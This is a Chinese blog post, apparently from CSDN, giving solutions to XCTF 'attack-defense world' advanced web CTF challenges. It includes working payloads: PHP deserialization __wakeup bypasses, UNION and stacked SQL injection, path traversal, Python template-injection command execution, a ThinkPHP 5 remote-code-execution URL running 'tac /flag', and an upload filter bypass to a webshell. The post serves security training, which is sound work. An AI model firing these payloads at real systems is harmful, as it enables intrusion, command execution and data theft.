攻防世界 web进阶区1

于 2022-07-13 17:27:34 发布
阅读量1k 收藏 3
点赞数 1
分类专栏: 刷题 wp 文章标签: php 安全 ctf web 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61768489/article/details/123239320
版权

目录

baby_web

Training-WWW-Robots

PHP2

unserialize3

 Web_php_unserialize

Web_php_include

warmup

ics-06

NewsCenter

upload1

supersqli 

Web_python_template_injection

NaNNaNNaNNaN-Batman

php_rce

web2

baby_web

题目描述:想想初始页面是哪个

那第一感觉就是index.php 然后在url里面输入后直接跳转到1.php,所以抓包试试,就出了

Training-WWW-Robots

直接查看robots协议

 

PHP2

上来就这个 ,啥也没有

信息收集, 后缀index.phps ,出现源码

<?php
if("admin"===$_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

第一个 if 如果成立的话就要退出来,显然我们要让第一个 if 不成立,就是不能上传一个变量id=admin,但是我们要让上传的这个变量id经过url解码之后等于admin,而且我们知道在当传入参数id时,浏览器在后面会对非ASCII码的字符进行一次urlencode(编码),运行时会自动进行一次urldecode(解码)
所以我们要上传的admin必须要进行两次URL编码

找个能编码的网站真费尽啊

unserialize3

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

攻防世界unserialize3题解_黑锤的博客-CSDN博客_攻防世界unserialize3

此文章讲的很明白,学习了一波 

__wakeup()执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行__wakeup()函数,这也是一个绕过点。

这个是解决咱们这道题的重点了

思路就出来了,将这个对象进行序列化传值,修改其属性这样就可以进行绕过__wakeup了)

当被反序列化的字符串其中对应的对象的属性个数发生变化时,会导致反序列化失败而同时使得_wakeup()函数失效,就是问题的关键所在。所以对其进行修改:

O:4:"xctf":2:{s:4:"flag";s:3:"111";}  修改属性个数
payload:
http://111.200.241.244:51023/?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

这道题是绕过__wakeup()函数,利用的也算是反序列化的知识:当被反序列化的字符串其中对应的对象的属性个数发生变化时,会导致反序列化失败而同时__wakeup也会失效,如果这里我不对其属性的改变,也就是不将1改为2,那么返回的东西是什么呢?

很简单,当然是立即调用__wakeup()函数可想而知返回的就是bad requests.

 Web_php_unserialize

还是跟着大佬学习,写的很好

攻防世界-Web_php_unserialize详解_Mr_helloword的博客-CSDN博客

<?php
class Demo
{
    private $file = 'index.php';
    public function __construct($file)
    {
        $this->file = $file;
    }
    function __destruct()
    {
        echo @highlight_file($this->file, true);
    }
    function __wakeup()
    {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}
$A = new Demo('fl4g.php');                    //创建对象
$C = serialize($A);                     //对对象A进行序列化
$C = str_replace('O:4', 'O:+4', $C);      //绕过正则表达式过滤
$C = str_replace(':1:', ':2:', $C);         //wakeup绕过
var_dump($C);
var_dump(base64_encode($C));            //base64加密

 paylod:

http://111.200.241.244:53678/?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

Web_php_include

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

直接大写绕过php ,用input

warmup

在buu学习了一次了跟着wp复现了,这次自己复现

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

mb_strpos()

 逻辑搞清楚 ,这段代码其实就是 $_page=$page ,urlencode后也是如此

 $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );

也就是满足 传入的$file在whitelist里 ,也就是 source.php或者hint.php,代码会一直true下去

配合hint的内容 

 构造payload

/?file=hint.php%253f../../../../../../../ffffllllaaaagggg
         %253f 是?的 两次url编码

/?file=hint.php?../../../../../../../ffffllllaaaagggg

ics-06

只有这个页面能操作,get了一个id=1 ,然后这就是直接爆破出来

NewsCenter

尝试一下sql注入,看见这个稳了一半了

 常规注入

1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='news')#

1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='secret_table')#

1' union select 1,2,(select group_concat(fl4g) from news.secret_table)#

upload1

只是前端限制必须上传jpg ,png 

抓包修改后缀成php 连蚁剑

supersqli 

[强网杯 2019]随便注 1 - ZM思 - 博客园

就是强网杯随便住

过滤了一众关键词,使用堆叠注入查看表名

-1';show databases;# 

-1';show tables;#

 

 先把words表名改为其他名,再把1919810931114514表名改为words,但是其中还缺少id列,因此可以添加一个id列或者吧flag改为id,这样这个表就成为了默认查询表,

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

输入 1' oi 1=1 # 就查出来了

Web_python_template_injection

题目python大概就是SSTI

没有看到注入点,这题直接放url后面就行

放两个可以用的payload 

{{ config.__class__.__init__.__globals__['os'].popen('cat fl4g').read() }} 
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('ls').read()}}

NaNNaNNaNNaN-Batman

是一个附件,一段js乱码

 复制这一部分去控制台运行,然后就可以继续美化,

function $() {
	var e = document.getElementById("c")
		.value;
	if (e.length == 16)
		if (e.match(/^be0f23/) != null)
			if (e.match(/233ac/) != null)
				if (e.match(/e98aa$/) != null)
					if (e.match(/c7be9/) != null) {
						var t = ["fl", "s_a", "i", "e}"];
						var n = ["a", "_h0l", "n"];
						var r = ["g{", "e", "_0"];
						var i = ["it'", "_", "n"];
						var s = [t, n, r, i];
						for (var o = 0; o < 13; ++o) {
							document.write(s[o % 4][0]);
							s[o % 4].splice(0, 1)
						}
					}
}
document.write('<input id="c"><button onclick=$()>Ok</button>');
delete _

逻辑就是构造变量e: be0f23开头,中间要匹配到233ac和c7be9,结尾要有e98aa

而且长度限制16

那就可以是be0f233ac7be98aa ,后面的代码也看球不懂

将下载的附件保存为html 就出现了一个提交表单

提交构造好的e就可了

php_rce

 ThinkPHP V5,直接github有payload ,拿来用 

GitHub - SkyBlueEternal/thinkphp-RCE-POC-Collection: thinkphp v5.x 远程代码执行漏洞-POC集合

 

 这个可以打通,直接ls查目录 rce即可

http://61.147.171.105:60397?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tac /flag

 

web2

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";

function encode($str){
    $_o=strrev($str);
    // echo $_o;
        
    for($_0=0;$_0<strlen($_o);$_0++){
       
        $_c=substr($_o,$_0,1);
        $__=ord($_c)+1;
        $_c=chr($__);
        $_=$_.$_c;   
    } 
    return str_rot13(strrev(base64_encode($_)));
}

highlight_file(__FILE__);
/*
   逆向加密算法,解密$miwen就是flag
*/
?>

纯加密逻辑,把$miwen先rot13再翻转再base64decode,处理一下得到$_o

按照循环逻辑 反向来一遍即可

$_o = "~88:36e1bg8438e41757d:29cgeb6e48c`GUDTO|;hbmg";

for($_0=strlen($_o)-1;$_0>=0;$_0--){
    $_c=substr($_o,$_0,1);
    $__=ord($_c)-1;
    $_c=chr($__);
    $_=$_.$_c;
}
echo $_;

ThnPkm
关注
专栏目录
攻防世界web进阶
weixin_54787877的博客
02-21 304
unserialize3 知识点:反序列化漏洞,wakeup魔法函数 php <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= ?> 先对代码补全然后进行审计。 class xctf{ //定义一个名为xctf的类 public flag=′111′;//定义一个公有的类属性flag = '111';
攻防世界web进阶全讲解(超详细的哇)!!(持续更新)
wo41ge的博客
10-13 2483
进入题目链接 有登录 就可能有注册界面 url栏register.php 或者直接上御剑扫一下 同样发现注册界面 注册成功后 进行登录 跳转到了这个界面
[ 攻防世界 ] web进阶
Dannie01的博客
11-23 944
目的:练习做题手感和思路 CAT 搜索框搜索 弹出?url= 猜测是SSRF,所有协议均被过滤 http:// file:/// dict:// gopher:// 回归题目和描述,由CAT联想是命令执行,依然是 invalid url 思路切入点 invalid url => fuzz fuzz是我思路和实践弱项,积累 ?url=%88 宽字节,获取报错信息 html源码 复制粘贴本地查看 看到了熟悉的django报错页面,看来是将输入的参数传到了后端的django服务中进行解析,而d.
攻防世界 Web进阶(一)
未完成的歌~的博客
10-15 471
嗯..,终于把新手的题做完了,感觉学到了不少东西( •̀ ω •́ )y 今天来记录下进阶题 1、ics-06 2、PHP2 3、mfw
攻防世界 web进阶1
weixin_63231007的博客
03-30 256
003PHP2 通过index.phps查看源码得知: 代码审计得知,我们需要将传递的id,经过浏览器自动url解码,与urldecode()函数两次解码后等于admin,才可得到flag。使用burp_suite decoder模块 得知%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65两次url解码后为admin。将其传入id,得到flag。 004 Web_php_unserialize 首先看到源码,出现敏感函数wakeup,考虑绕过反序列化
攻防世界-Web(进阶)
qwzf
09-05 607
前言 又做了几道攻防世界Web题,总结一下。 Web1:Cat 题目没提示。点开题目,以为是命令执行。然而几番尝试后,发现并不是。。。 其它也没什么提示,没思路了。偷瞄大佬博客 然后我开始复现,?url=%80产生报错,找到绝对路径。 从配置文件settings.py的报错中查看database的相关信息?url=@/opt/api/api/settings.py ?url=@/opt...
攻防世界-Web进阶篇-005unserialize3】
gyy990526的博客
03-14 2793
解:打开靶机是一段php代码,最后问你?code=应该等于多少,看见_wakeup()就是典型的反序列化的题。 题目比较简单,只有一个xctf类,首先需要对其实例化,再用serialize进行序列化输出字符串 : <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $xctf=new xc
攻防世界 web高手进阶 10分题 Guess
闵行小鱼塘
11-03 1354
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是Guess的writeup
攻防世界 web高手进阶 10分题 xss1
闵行小鱼塘
11-10 752
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是xss1的writeup
攻防世界 web高手进阶 10分题 TimeKeeper
闵行小鱼塘
10-19 1435
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是TimeKeeper的writeup
攻防世界-WEB进阶篇(一)
weixin_42271850的博客
02-09 1737
简述 这是自己的第二篇博客,在上次学习了WEB的新手篇后,这次轮到WEB进阶篇的学习了。同样写下这个博客的目的也是督促自己再重新做一遍这些题目,因为第一次做的时候参考了很多的writeup,所以也想借此机会看一下自己学习的成果如何。 一、Training-WWW-Robots 从题目就能看到提示,应该是和Robots.txt文件相关的。直接在URL后面输入/robots.txt。 可...
攻防世界 web 进阶 Website
weixin_42499640的博客
08-13 670
打开网页 注册一个用户 使用注册的用户登陆 get flag 提示no admin, no flag XP 使用admin帐户才能得到flag 抓个包看看怎么改包能伪造admin 两个关键参数 username , csrftoken username是加密过的 csrftoken:为了防止跨站域请求伪造,有的网站请求中会加入这个验证,在登录及登录后续的操作都会让你携带csrftoken,问...
攻防世界-web进阶
楼阁de猫的博客
10-30 985
目录baby_webTraining-WWW-Robots baby_web 题目描述:想想初始页面是哪个 打开链接看到这个界面 这里有两种解法 法一:我们输入index.php ,就会立即跳转到1.php 那我们就对index.php抓包看看 在请求头看到flag:flag{very_baby_web} 法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到 Training-WWW-Robots 打开链接是这样一个
攻防世界 web进阶 NewsCenter
weixin_43345082的博客
06-12 1488
看到这道题没什么头绪,扫完之后没有什么有用的信息 只有一个输入,试试sql 首先判断列,1’ order by 3# 有3列 首先去爆库 1’ union select 1,2,database()# 库是news,继续爆表 看到一个secret_table,爆他的列 1’ union select 1,2,column_name from information_schema.colum...
记录攻防世界web进阶
goddemon
06-08 1721
Web_php_include 考点:考审计php代码的基本能力,以及绕开的能力 知识点: 1.两个函数 ①str_replace(“php://”, “”, page);替换函数②strstr(page);替换函数 ②strstr(page);替换函数②strstr(page, “php://”)查找函数,即输出在一个字符串里面第一次出现的位置(且对大小写敏感)即绕开了 php://input功能应用 (接受请求的get或者post数据) 2.data协议的用法 3.数据库写马的方法 方法一: 利用str
攻防世界-web进阶-supersqli
weixin_47346400的博客
02-26 171
wp传送门
攻防世界web进阶 攻略
weixin_46329549的博客
03-22 658
进阶题前言:**1.isc-06**2.php23.baby_web**4.php-rce** 前言: web进阶题目相对于新手较难,此博客只是记录了一些比较重要或者 有代表性的题目,比较难的题暂时不会解,以后还会有补充。 1.isc-06 这道题用到了对id参数进行爆破。进入题目后看到url后存在参数id,使用各种注入方式后均没有爆破成功,最后使用bp对id参数进行爆破 进入报表中心,看到...
攻防世界-WEB进阶篇(二)
weixin_42271850的博客
07-05 301
简述 好久没有更新这个XCTF的题目了,现在过来更新一下。争取今年能够入门CTFWEB方向。 一、PHP2 从题目就能看到提示,应该是和Robots.txt文件相关的。直接在URL后面输入/robots.txt。 可以看到提升我们网站中有fl0g.php这个文件。我们直接访问就能得到flag。 二、baby_web 题目描述想想初始页面是哪个,再结合点击的链接为http:/...
攻防世界-WEB进阶-bug
qq_64966153的博客
07-04 1114
攻防世界 bug靶场
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值